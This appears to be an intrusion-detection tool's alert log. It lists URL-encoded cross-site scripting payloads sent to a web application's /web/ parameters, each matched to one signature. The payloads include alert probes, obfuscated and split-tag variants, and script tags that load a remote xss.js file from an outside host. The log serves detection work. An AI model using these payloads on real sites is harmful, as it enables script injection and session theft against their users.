Packet [556]	Uri [/web/?show=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [565]	Uri [/web/?show=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [566]	Uri [/web/?show=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [567]	Uri [/web/?show=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [568]	Uri [/web/?show=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [569]	Uri [/web/?show=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [570]	Uri [/web/?show=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [571]	Uri [/web/?show=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [572]	Uri [/web/?show=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [577]	Uri [/web/?show=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [578]	Uri [/web/?show=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [583]	Uri [/web/?show=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [584]	Uri [/web/?show=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [595]	Uri [/web/?show=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [596]	Uri [/web/?show=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [603]	Uri [/web/?show=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [604]	Uri [/web/?show=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [613]	Uri [/web/?show=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [614]	Uri [/web/?show=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [630]	Uri [/web/?show=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [631]	Uri [/web/?show=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [634]	Uri [/web/?show=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [635]	Uri [/web/?show=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [644]	Uri [/web/?show=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [645]	Uri [/web/?show=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [652]	Uri [/web/?show=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [653]	Uri [/web/?show=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [714]	Uri [/web/?disableScroll=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [715]	Uri [/web/?disableScroll=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [720]	Uri [/web/?disableScroll=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [721]	Uri [/web/?disableScroll=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [738]	Uri [/web/?disableScroll=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [739]	Uri [/web/?disableScroll=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [740]	Uri [/web/?disableScroll=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [741]	Uri [/web/?disableScroll=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [742]	Uri [/web/?disableScroll=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [743]	Uri [/web/?disableScroll=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [744]	Uri [/web/?disableScroll=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [745]	Uri [/web/?disableScroll=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [748]	Uri [/web/?disableScroll=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [749]	Uri [/web/?disableScroll=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [770]	Uri [/web/?disableScroll=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [771]	Uri [/web/?disableScroll=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [776]	Uri [/web/?disableScroll=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [777]	Uri [/web/?disableScroll=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [786]	Uri [/web/?disableScroll=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [787]	Uri [/web/?disableScroll=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [788]	Uri [/web/?disableScroll=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [789]	Uri [/web/?disableScroll=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [790]	Uri [/web/?disableScroll=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [791]	Uri [/web/?disableScroll=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [792]	Uri [/web/?disableScroll=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [793]	Uri [/web/?disableScroll=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [798]	Uri [/web/?disableScroll=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [799]	Uri [/web/?disableScroll=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [804]	Uri [/web/?disableScroll=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [805]	Uri [/web/?disableScroll=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [816]	Uri [/web/?disableScroll=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [817]	Uri [/web/?disableScroll=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [824]	Uri [/web/?disableScroll=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [825]	Uri [/web/?disableScroll=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [834]	Uri [/web/?disableScroll=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [835]	Uri [/web/?disableScroll=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [850]	Uri [/web/?disableScroll=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [851]	Uri [/web/?disableScroll=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [854]	Uri [/web/?disableScroll=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [855]	Uri [/web/?disableScroll=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [864]	Uri [/web/?disableScroll=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [865]	Uri [/web/?disableScroll=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [872]	Uri [/web/?disableScroll=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [873]	Uri [/web/?disableScroll=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [935]	Uri [/web/?child=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [936]	Uri [/web/?child=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [941]	Uri [/web/?child=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [942]	Uri [/web/?child=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [959]	Uri [/web/?child=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [960]	Uri [/web/?child=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [961]	Uri [/web/?child=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [962]	Uri [/web/?child=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [963]	Uri [/web/?child=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [964]	Uri [/web/?child=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [965]	Uri [/web/?child=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [966]	Uri [/web/?child=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [969]	Uri [/web/?child=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [970]	Uri [/web/?child=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [991]	Uri [/web/?child=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [992]	Uri [/web/?child=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [997]	Uri [/web/?child=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [998]	Uri [/web/?child=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1007]	Uri [/web/?child=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1008]	Uri [/web/?child=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1009]	Uri [/web/?child=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1010]	Uri [/web/?child=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1011]	Uri [/web/?child=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1012]	Uri [/web/?child=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1013]	Uri [/web/?child=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1014]	Uri [/web/?child=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1019]	Uri [/web/?child=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1020]	Uri [/web/?child=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1025]	Uri [/web/?child=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1026]	Uri [/web/?child=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1037]	Uri [/web/?child=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1038]	Uri [/web/?child=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1045]	Uri [/web/?child=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1046]	Uri [/web/?child=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1055]	Uri [/web/?child=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1056]	Uri [/web/?child=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1071]	Uri [/web/?child=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1072]	Uri [/web/?child=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1075]	Uri [/web/?child=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1076]	Uri [/web/?child=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1085]	Uri [/web/?child=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1086]	Uri [/web/?child=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1093]	Uri [/web/?child=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1094]	Uri [/web/?child=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
# N. packets [1148], [222] with alerts, N. Alerts [222]
# Execution time: 0.303390 s
